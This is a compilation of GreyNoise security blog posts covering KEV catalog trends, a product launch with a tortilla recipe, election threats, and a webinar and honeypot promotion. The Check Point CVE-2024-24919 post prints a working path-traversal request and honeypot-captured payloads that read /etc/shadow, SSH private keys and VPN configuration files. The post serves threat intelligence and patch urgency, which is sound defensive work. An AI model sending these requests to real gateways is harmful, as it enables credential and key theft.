The average age of CVEs added to the KEV decreases over time. In 2023, which we consider the first full baseline year, most vulnerabilities were added within the first week of their assignment. This trend suggests not only are vulns being exploited faster (we know this) but also improved information sharing and partnerships between CISA and other organizations.

Additionally, the shift towards younger CVEs being added to KEV is encouraging as it indicates that the security community is becoming more proactive in identifying exploitation. For organizations, this means staying vigilant and ready to respond quickly to newly disclosed vulnerabilities, as they're more likely to be added to the KEV shortly after discovery.

The Fluidity of the "Known Ransomware Campaign Use" Field

A lesser-known aspect of the KEV data is that it's not static. 

In October 2023, CISA added a field called "known ransomware campaign use" to the catalog. We found that this field is updated silently and can change from "unknown" to "known" without fanfare. From October 2023 → July 2024, this field was updated 41 times.

Research suggests that vulnerabilities flagged for known ransomware use are patched 2.5 times faster; this makes sense given the significant financial and operational impacts of ransomware attacks. Organizations should pay close attention to this field and regularly check for updates. It goes without saying that if a vulnerability in your environment is flagged for known ransomware use, it should be prioritized for patching immediately.

Prioritization Insights from within the KEV Data

Another interesting finding is that by considering two data points from within the KEV, you can discern a “level of concern” that organizations can use to make more informed decisions about which vulnerabilities to address first when resources are limited.

1. The time that is given to fix the vulnerability.

Early on, the time to fix a vulnerability was either 14 or 180 days. Shortly after the Russia/Ukraine war, CISA seemed to adjust to a 21-day fixed period. However, if you look at the bottom right of the plot, you'll notice that there have been a handful of vulnerabilities with even shorter fix timelines in the last year.

2. The day of the week the vulnerability was added to the KEV.

Interestingly, the day of the week a vulnerability is added can be telling. In the past year+, there have only been two drops on a Friday, and both had a time to fix of 7 days (a time to fix of 7 days has only happened six more times). Overall, the time to fix has standardized to 21 days for most entries, but shorter timeframes indicate higher-priority vulnerabilities. 

To summarize, although the KEV catalog is mainly intended for government use, it provides valuable insights for prioritizing vulnerabilities. Cybersecurity professionals can enhance their remediation efforts by analyzing patterns such as vendor dominance, time given to fix, the day of the week an issue was added, and any changes to the ransomware field.

Again, the full talk can be found here, and the slides and dataset can be found here.

The Tortilla Test: Ensuring Your Vulnerability Intelligence is Always Fresh

All of my friends (and my bathroom scale, honestly) will tell you that I love tortillas.  Not just any tortillas, however…they have to be homemade.  I make sure we have homemade tortillas every week and keep them in the fridge.  They are better than anything you can buy in a store, and they are simply amazing when they are hot off the comal.  My kids know this; when they see the comal on the stove, they make a point of hanging around the kitchen to snag one (often a few!) while they are fresh because they understand that freshness is everything for tortillas.

It turns out the same is true for vulnerability intelligence!

In just the first 6 months of 2024, we’ve seen over 2,000 remotely exploitable, no-authentication-necessary CVEs be published.  These are the kinds of vulnerabilities that are exploited on the Internet - via APTs and criminals or botnets driving mass exploitation - every minute of every day.  This is a huge amount to deal with, and what we’ve seen this year is that they are occurring more frequently on edge devices that don’t have many mitigating controls to protect them.  When these things happen, it forces security teams to drop what they are doing and scramble for a fix.

There are many existing vulnerability prioritization solutions that can help by including information like “Known Exploits Available” or “In the Wild”. The issue is that these attributes quickly become stale.  Technically, a snippet of proof-of-concept code is an available exploit, but it isn’t the same as a mass exploitation attack by a criminal organization.  A hard-to-exploit race condition that requires a lot of time and effort might be “In the Wild”, but that doesn’t require the same urgency to fix as something an actor is actively exploiting today.  In many ways, these attributes (in addition to CVSS Base Scores, Vendor bulletins, etc) are like stale tortillas - edible but ultimately unsatisfying.

At GreyNoise we believe that security teams deserve actionable information that is fresh enough to know what attackers are doing right now, so that they can respond with the speed and urgency required.  Consequently, today we’re launching GreyNoise for Vulnerability Prioritization to give our customers exactly that.

Here’s how it works:

We run a global network of thousands of sensors that emulate the types of assets enterprises have exposed to the Internet:  web servers, network gear, etc.  We see when attackers and bots start probing them, and we collect the data as they are attacked in real-time.  We compare this against known bad behaviors and known IPs; our ML models are even capable of alerting us to unknown but suspicious or malicious activities that are the hallmarks of novel exploits. This is all unique, primary data that we collect rather than simply aggregating from third-party sources.  In other words, we make fresh tortillas from scratch rather than just reselling ones we bought from a supermarket.

As we collect this information, we make it immediately available via our Visualizer for ad-hoc usage and through our API for inclusion in your existing automation.  We ensure that information is always fresh, so that you can get the most up-to-date intel for as long as you need until you fix the problem.

There are many good vulnerability prioritization tools out there, but we believe that only we can tell vulnerability teams which CVEs need attention now based on what attacks are actually happening today.  Because Vuln Intel is based on all the same data that powers GreyNoise, you’ll also be able to share what you know seamlessly with your SOC analysts and threat hunters.

We think you’ll enjoy having fresh and actionable information with Greynoise Vulnerability Prioritization.  You can visit our website to learn more or schedule time to talk with us directly. 

I know you’ll also love having fresh and delicious tortillas, so please enjoy this recipe.  I look forward to hearing from you about both!

Flour Tortillas Recipe

Ingredients:

  • 4 parts all-purpose flour 
  • .1 part salt
  • 1 parts lard (or shortening, but lard is the best)
  • 2 parts water - hot water for thin and chewy tortillas, cold water for thick and fluffy

For example, I find 300gm (4 x 75gm)  flour + 75gm lard (1 x 75gm) + 8gm salt (.1 x 75gm) mixed with 150gm (2 x 75gm) hot water makes 8 burrito-sized or 12 fajita-sized tortillas.

Instructions:

  • Place flour, salt, and lard in a bowl.  Add in water; if using hot water, give it 30 seconds to melt the lard.
  • Knead for 1 minute - it should be tacky but not so sticky it won't easily come off your fingers; you can add a little flour if needed.
  • Let stand covered for 30 minutes.
  • Heat a cast iron griddle (a skillet works too) on med-high for 5 minutes (i.e. at the 25-minute mark)
  • Divide the dough into golf ball-sized portions.
  • Using a rolling pin, roll one into 6-9 inch diameter rounds.
  • Cook 30 seconds on one side - you'll see bubbles form on the top when it is time to flip.  Now is a great time to roll the next round while it cooks.
  • Flip and cook for another 15-30 seconds; I like longer to get a few charred spots.
  • Stack on a plate and cover with a towel.

Eat them soon — they will be unbelievably good for 60 minutes, very good the rest of the day, and better than anything you can buy in the store for at least a week if you keep them in the fridge. 

Understanding the Election Cybersecurity Landscape

As we edge closer to the 2024 U.S. elections, the cybersecurity landscape surrounding this crucial event is more complex and dynamic than ever. The sheer variety of targets, tactics, and threats highlights the immense challenge of securing our democratic process. From state-sponsored entities to cybercriminals and hacktivists, a multitude of actors are ready to exploit any vulnerabilities they can find. Understanding this broad landscape is essential for grasping the challenges we face and appreciating the efforts required to safeguard our elections.

To help reduce any confusion, and provide some solid guidance, we’ve put together a multipart series that we’ll be releasing over the coming weeks. The goal is to help folks understand what’s truly at-risk, along with helpful things you can do to join in the efforts to maintain and increase the cyber safety and resilience of America’s elections. We’re starting, today, with an overview of who and what is truly at risk, along with a high-level review of the adversaries and tactics in play. Over the remaining series, we’ll tackle:

  • the role of state-sponsored actors in election interference
  • phishing and social engineering
  • the threat of deepfakes and disinformation campaigns

Let’s dive in!

The Targets

When we think about election security, our minds often jump to voting machines and voter registries. While these are certainly critical, the attack surface extends far beyond them. Political campaigns, for instance, rely heavily on digital infrastructure, including websites, email systems, and databases. These elements are prime targets for cyber intrusions and disinformation campaigns designed to disrupt operations and erode public trust. Political parties, too, are vulnerable, with adversaries seeking to steal sensitive information or create chaos within their ranks.

News and social media platforms also play a crucial role in the election process. Unfortunately, they are frequently exploited to spread disinformation and sow discord among voters. Manipulating these platforms can have far-reaching consequences, influencing public opinion and undermining the democratic process. Election management systems, responsible for counting, auditing, and reporting results, are also critical targets. Ensuring the integrity of these systems is paramount to maintaining the credibility of the electoral outcome.

The Tactics

The tactics employed by threat actors are as diverse as the targets they pursue. Traditional cyber intrusions, such as phishing and spear phishing, remain prevalent, allowing adversaries to gain unauthorized access to sensitive systems and data. Distributed denial of service (DDoS) attacks aim to disrupt the availability of critical election-related websites and services, potentially causing widespread confusion and delays. Ransomware, which involves encrypting critical data and demanding payment for its release, poses a significant threat to election infrastructure, with the potential to cripple essential operations.

While most voting machines are not directly connected to the internet, they are still vulnerable to internet-based attacks through indirect means. For example, voting machines must accept electronic input files from other computers, such as ballot definition files prepared on Election Management System (EMS) computers. If these EMS computers are compromised, they can introduce fraudulent data or malicious code into the voting machines. This indirect connection to the internet creates a potential attack vector that sophisticated adversaries could exploit.

Recently, the rise of deepfakes and disinformation has added a new layer of complexity to the cybersecurity landscape. The use of AI-generated content to mislead voters and manipulate public opinion has become increasingly sophisticated, making it harder to discern truth from falsehood. These tactics are not only disruptive, but also corrosive, eroding trust in the electoral process and the institutions that support it.

The Actors

The actors behind these threats are varied, each with distinct motivations and capabilities. State-sponsored actors, including nations such as Russia, China, Iran, and North Korea, have been identified as significant threats. These entities aim to undermine U.S. elections to destabilize the country and influence its policies. Their sophisticated operations often involve a combination of cyber intrusions, disinformation campaigns, and other tactics designed to achieve strategic objectives.

Cybercriminals, on the other hand, are typically motivated by financial gain. They may deploy ransomware or sell stolen data on the “dark web”, exploiting vulnerabilities for profit. Hacktivists, driven by ideological beliefs, seek to promote their political agendas by disrupting election processes or exposing perceived injustices. While their methods may differ, the impact of their actions can be equally damaging.

The Importance of Vigilance

Understanding the broad landscape of election cybersecurity threats plays a significant role in helping us grasp the complexity and scope of the challenges faced. This knowledge helps the public appreciate the efforts required to secure elections and underscores the importance of vigilance and proactive measures. 

As we approach the 2024 elections, enhanced security measures, such as implementing multifactor authentication and conducting regular vulnerability assessments, are vital. Public awareness and education about common disinformation tactics can help mitigate the impact of false information. At the same time, collaboration and information sharing between federal, state, and local agencies, as well as private sector partners, are essential for a coordinated response to emerging threats.

By comprehending and addressing the diverse array of threats, tactics, and actors in the election cybersecurity landscape, we can better protect the integrity of our democratic processes and ensure that every vote counts.

Perma-Vuln: D-Link DIR-859, CVE-2024-0769

Discover the latest findings from GreyNoise Labs as we delve into a perma-vuln plaguing the D-Link DIR-859 router. In our newest blog post, "Perma-Vuln: D-Link DIR-859, CVE-2024-0769," we uncover the intricacies of CVE-2024-0769, a path traversal vulnerability affecting D-Link DIR-859 WiFi routers, leading to information disclosure.

The exploit's variations, including one observed in the wild by GreyNoise, enable the extraction of account details from the device. The product is End-of-Life, so it won't be patched, posing long-term exploitation risks. Multiple XML files can be invoked using the vulnerability.

Click here to see the details and interesting payload that Sift has identified.

SolarWinds Serv-U (CVE-2024-28995) exploitation: We see you!

On June 5, 2024, SolarWinds published an advisory detailing CVE-2024-28995 - a path-traversal vulnerability in Serv-U, discovered by Hussein Daher. Our Labs team - with our brand new deception engineer - seized this opportunity to deploy a new honeypot they've been working on. It's supposed to look more real - and vulnerable! - than past honeypots.

What did they discover?

They show off all kinds of information gleaned from their honeypot - who's attacking it, what files they're trying to steal, how often they come back, and more.

But, that's not all!

They actually managed to capture a live attacker making several copy/paste mistakes, and attempting to correct the exploit only to foul it up again! They track the attacker's progress over the course of 4 hours, including one instance where they sent the completely wrong exploit (which happens to be for an unpatched vulnerability!).

Check out the full blog on GreyNoise Labs to learn more about this vulnerability and our observations.

What's Going on with CVE-2024-4577 (Critical RCE in PHP)?

Check out the latest from GreyNoise Labs as we examine the technical details of CVE-2024-4577, a serious remote code execution vulnerability in PHP affecting Windows deployments. Discovered by DEVCORE and demonstrated by watchTowr, this vulnerability exploits a 'best-fit' Unicode processing behavior in Windows. This allows attackers to inject command-line arguments via HTTP requests.

Detailed examples of payloads observed in the wild to achieve remote code execution are included, showcasing how attackers exploit the vulnerability in the real world. These payloads range from simple PHP code snippets to more complex scripts that download and execute malicious binaries.

Check out the detailed post here for a deeper dive into the technical details and the full range of payloads.

What’s Going on With Check Point (CVE-2024-24919)?

On May 28, 2024, Check Point published an advisory (and emailed customers) regarding CVE-2024-24919, a CVSS 8.6 vulnerability that they described using fairly vague language: "exploiting this vulnerability can result in accessing sensitive information on the Security Gateway. This, in certain scenarios, can potentially lead the attacker to move laterally and gain domain admin privileges."

Although they buried the lede a bit, if you scroll way down and click through a bit, you'll see that attacks in the wild occurred as far back as April 7, 2024 (nearly 2 months)! Two days after the advisory came out (May 30, 2024), we published a tag, which currently shows rapidly increasing exploitation:

Although you can’t see it on the graph, the very first attempts we saw were on May 31, 2024 at around 9:30am UTC. We also observed some attempted exploits on May 30, 2024, but they don’t show up in our public data because they don’t actually work (more on that below).

On the same day (May 30, 2024), watchTowr labs published an amazing write-up that includes a working proof of concept. On that same day, CISA added it to the Known Exploited Vulnerabilities list.

On May 31, 2024, our friends at Censys published their write-up, which indicated that there are nearly 14,000 devices running some version of that software, although it’s not clear how many of those have exposed management ports.

The vulnerability

The core vulnerability is a pretty straight-forward path traversal issue. One of the folks on my team reverse engineered the patch concurrently with watchTowr and came up with basically the same exploit (this one is from watchTowr):

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Since the server runs as root, an attacker can grab any file on the filesystem! We’ll show you what attackers are actually searching for below.

Our observations

Sift

Although we tagged this issue very quickly, we actually saw the first exploit attempt (attempt), with a non-working exploit, hitting Sift on May 30, 2024 - presumably somebody thought they’d figured it out and pushed the big “go” button a bit too quickly:

POST /clients/MyCRL HTTP/1.1
Host: <ip>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 38
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)

/clients/MyCRL/../../../..//etc/shadow

We started seeing actual exploitation attempts logged in Sift on May 31, 2024:

POST /clients/MyCRL HTTP/1.1
Host: <ip>
Connection: close
Accept-Encoding: gzip
Connection: close
Content-Length: 39
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

aCSHELL/../../../../../../../etc/shadow

I’m always impressed when an automated system can catch a novel exploit without being told about it!

Honeypot data

We manually searched our honeypot data going back 90 days prior to today (June 4, 2024), and the oldest exploit attempts that we see started on May 30, 2024, at about 5pm UTC:

POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/<IP_ADDRESS> Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 38

/clients/MyCRL/../../../..//etc/passwd

The word “attempts” is doing a lot of work in that sentence because, from what we can tell, this payload doesn’t actually work - perhaps somebody pressed the big red button before actually testing their exploit?

In any case, the IP address using that broken payload was 125.229.221.55, a Taiwan-based address that started scanning for HNAP-enabled devices on May 30, 2024, then a few hours later (on the same day) started scanning for CVE-2024-24919. We can’t say with certainty whether the HNAP scan is related, but it’s the only other traffic we’ve ever seen from that IP address. In the exploits, the IP attempted to fetch /etc/passwd and /etc/shadow.

The first real exploitation we observed began on the morning of May 31, around 9:40am UTC, when a New York-based IP address, 45.88.91.78, took a break from searching for CISCO ASA appliances and started launching exploits for this issue with a payload that would appear to actually work (and, in fact, is suspiciously identical to watchTowr’s PoC, including the number of ../s):

POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:82.0) Gecko/20100101 Firefox/82.0
Connection: close
Content-Length: 39
Accept-Encoding: gzip

aCSHELL/../../../../../../../etc/shadow

Around that same time, a chorus of different scanners emerged that used a bunch of different paths. Due to the nature of the vulnerability, it’s very hard to determine the actual intent of the attacker - all we know is which file they’re trying to fetch. Whether they’re using that to steal passwords or to test the vulnerability is hard to know.

That being said, as of June 4, 2024, here is the top-10 list of plausibly-working payloads that we’ve observed, with the counts:

4805 ../../../../../../../etc/fstab
2453 ../../../../../../../etc/shadow
980 ../../../../../../../sysimg/CPwrapper/SU/Products.conf
959 ../../../../../../../config/db/initial
508 ../../../../../../../etc/passwd
202 ../../../../../../../home/*/.ssh/authorized_keys
166 ../../../../../../../opt/checkpoint/conf/
165 ../../../../../../../etc/ssh/sshd_config
163 ../../../../../../../etc/vpn/vpn.conf
161 ../../../../../../../home/*/.ssh/id_rsa

It’s interesting to contrast that with this list, which we generated yesterday (June 3, 2024):

1615 ../../../../../../../etc/fstab
491 ../../../../../../../etc/passwd
486 ../../../../../../../etc/shadow
197 ../../../../../../../home/*/.ssh/authorized_keys
161 ../../../../../../../opt/checkpoint/conf/
160 ../../../../../../../etc/ssh/sshd_config
158 ../../../../../../../etc/vpn/vpn.conf
156 ../../../../../../../home/*/.ssh/id_rsa
94 ../../../../../../../home/*/.ssh/known_hosts
83 ../../../../../../../home/root/.ssh/authorized_keys

As you can see, /etc/fstab remains a popular target - probably it’s a reliable path being used by some off-the-shelf scanner(s).

/etc/shadow of course remains popular, but we’re suddenly seeing a lot of attempts to pull

/sysimg/CPwrapper/SU/Products.conf and /config/db/initial that we weren’t seeing yesterday. That demonstrates how the attack is evolving day over day!

Unfortunately, we didn’t directly observe the 0-day exploitation prior to the advisory being released; presumably, the attacks were targeted and didn’t hit our sensor network (although as we expand our new sensors and personas to real networks, we expect to start seeing this type of 0-day exploitation in Sift!)

Conclusion

With a public proof of concept out, and exploitation quickly ramping up, we recommend patching Check Point as soon as possible!

References

Cybersecurity in the Age of AI: What Experts are Saying

The cybersecurity market is undergoing a noticeable shift with the integration of AI, transitioning from using AI as a replacement for Googling to leveraging its advanced capabilities in pattern recognition and anomaly detection. Currently, there are many questions about what AI can truly achieve today and what the future holds. To address this, we assembled a panel of seasoned security professionals for an open discussion on the real potential of AI in cybersecurity and what is merely adding to the noise.

On Thursday, May 30th, GreyNoise is hosting a live webinar “AI for Cybersecurity: Sifting the Noise.” To give you a taste of what’s to come, we have asked each of our presenters a key question touching on one of the many topics we will explore in the discussion, let’s dig into their answers below:

Bob Rudis, VP of Data Science and Research

Q: What do you think is currently the biggest lie about AI?

A: The biggest misconception is that AI (particularly LLMs/GPTs) is seen as more than just a tool. Unlike traditional machine learning or a dictionary/thesaurus, these AI systems are marketed as intelligent actors or companions. However, they are simply tools that excel at understanding human input and generating responses based on vast amounts of data. Their perceived intelligence comes from their ability to produce useful outputs by recognizing patterns in data, not from any inherent understanding or consciousness.

Daniel Grant, Principal Data Scientist

Q: What AI advancement in the past few years are you most excited about?

A: The most obvious advancement is the development of highly capable LLMs. Just a few years ago, getting GPT-2 to produce coherent text was a challenge. Now, we have 70-billion parameter models that can run on laptops and chatbots that can pass the Turing test at your local Toyota dealership. Another exciting advancement is the improved quality of vector databases, which allow for direct, real-time access to entire datasets, reducing the need for compact machine learning models.

Ron Bowes, Security Researcher

Q: What's the most surprising thing an AI you've used has surfaced?

A: At GreyNoise, we developed a tool called Sift, which runs traffic seen by honeypots through magic machine-learning algorithms to help us (and customers!) see what attackers are up to each day.

One exploit that stood out to me a couple months ago was an attempt to exploit F5 BIG-IP that I wrote about on our Labs Grimoire blog. I'd recently spent time tidying up our F5 BIG-IP rules, since there's a lot of overlap between the various vulnerabilities and exploits (that is, several different vulnerabilities use very similar-looking exploits, and some of our older tags were mixing them up). One of the vulnerabilities I ran into was an exploit for CVE-2022-1388 (auth bypass), chained with CVE-2022-41800 (authenticated code execution, which I initially discovered and reported).

What was particularly interesting about that one is that they used the proof of concept (PoC) from the original CVE-2022-41800 disclosure, which I had designed to look super obvious, instead of using the actual exploit we also released. Not only that, but because CVE-2022-41800 is an *authenticated* RCE, they combined my PoC with a separate authentication-bypass vulnerability (CVE-2022-1388), which already had an RCE exploit that didn't require a secondary vulnerability. So, not only did they use the super obvious PoC, its usage was entirely unnecessary as well!

Presumably, the point of using this unusual combination was to avoid detection, but instead they just stood out more!

---

If these insights pique your interest, join us on Thursday for the live event where you can ask your own questions to our expert panel.

Honeypots Are Back: The Movie: The Blog

GreyNoise was founded to see what others don’t. That quest led us to build a unique global network of thousands of sensors across hundreds of strategically selected points of presence, giving cybersecurity practitioners unparalleled insight into online activity, whether malicious or benign. 

And in 2023, we saw something new.

In the second quarter of 2023 GreyNoise researchers observed a substantial change in internet scanning behavior. Malicious inventory scans significantly reduced in frequency and scale, and the vast majority of these types of scans now come from benign sources. This, along with the speed at which compromises follow vulnerability announcements, strongly suggests more capable attacker groups have implemented their own form of “attack surface monitoring”, to avoid tripping existing defenses. Attackers are now less likely to risk their reconnaissance infrastructure being detected and flagged prior to establishing confidence in a successful attack path.

A change in attacker behavior is rendering current defenses less effective. But an established technique is ready to rise to the challenge. Honeypots are back.

With attackers routing around observation and detection, traditional third-party threat intelligence cannot provide the targeted attack visibility that defenders need. A first-party, honeypot-based approach is ready to step into the breach.

While honeypot programs have traditionally struggled with deployment, operation, and data analysis, new technology is changing the game. Advances in infrastructure automation, network traffic shaping, cloud computing, and artificial intelligence make it possible to consistently identify novel attacks and reveal attacker infrastructure. New honeypot networks are easy to deploy, with flexible impersonation, believable personas, and automated analysis. Whether on an organization’s perimeter or deployed across the globe, they provide the insights defenders need to protect key systems before a breach. 

At GreyNoise, we haven’t just focused on tech leadership — we’ve brought in thought leadership as well. In order to educate the market about these new challenges, and how honeypots can help tackle them, our deception and intelligence experts Andrew Morris and Bob Rudis have published the Honeypots Are Back report. This report:

  • Breaks down targeted attacks
  • Compares third- and first-person threat intelligence
  • Discusses traditional honeypot challenges
  • Establishes a new honeypot maturity framework
  • Provides a security checklist for defenders to implement this necessary capability

To dive deeper into each of these topics, read the report here. To see a demonstration of the new honeypot capabilities under development at GreyNoise today, watch our on-demand honeypot webinar here. And if you’re ready to discuss standing up a mature honeypot network in your own environment, talk to our team

No blog articles found

Please update your search term or select a different category and try again.

Get started today